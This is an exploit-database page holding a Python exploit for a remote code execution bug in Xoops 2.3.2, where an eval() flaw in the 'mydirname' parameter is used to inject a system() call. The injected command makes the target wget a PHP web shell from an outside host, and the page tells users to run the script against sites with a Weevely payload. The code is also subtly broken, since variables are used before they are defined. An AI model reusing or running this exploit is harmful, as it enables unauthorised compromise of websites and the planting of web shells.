Xoops 2.3.2 Remote Code Execution

2012.10.02
Credit: infodox
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/env python # Title: Xoops 2.3.2 "mydirname" Remote Code Execution Exploit # CVE: ????-???? # Reference: http://secunia.com/advisories/33435/ # Author: infodox # Site: http://insecurety.net/ # Twitter: @info_dox # Old news, just practicin' my python :3 import requests import sys vulnurl = "/xoops_lib/modules/protector/onupdate.php?" # Oh look, the vuln URL! xpl = "mydirname=a(){}system(%27"+cmd+"%27);%20function%20v" cmd = "wget%20"+payloadurl+"%20-O%20shell.php" payloadurl = "http://example.com/shell.php" # Your evil PHP code goes here right? def banner(): print """ Xoops "mydirname" remote code execution exploit. Basically PHP Eval() bug :) Rather lame exploit I must admit, just practicing my Python. To use, just run it against the host and pray. I advise using a Weevely payload. ~infodox """ if len(sys.argv) != 4: banner() print "Usage: ./x2.py <target>" print "Where <target> is the vulnerable website." print "Example: ./x2.py http://lamesite.com" sys.exit(1) banner() target = sys.argv[1] pwnme = target + vulnurl + xpl print "[+] Running Exploit..." requests.get(pwnme) print "[?] Gotshell?" print "[+] Shell should be at "+target+"/xoops_lib/modules/protector/shell.php"

References:

http://secunia.com/advisories/33435/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top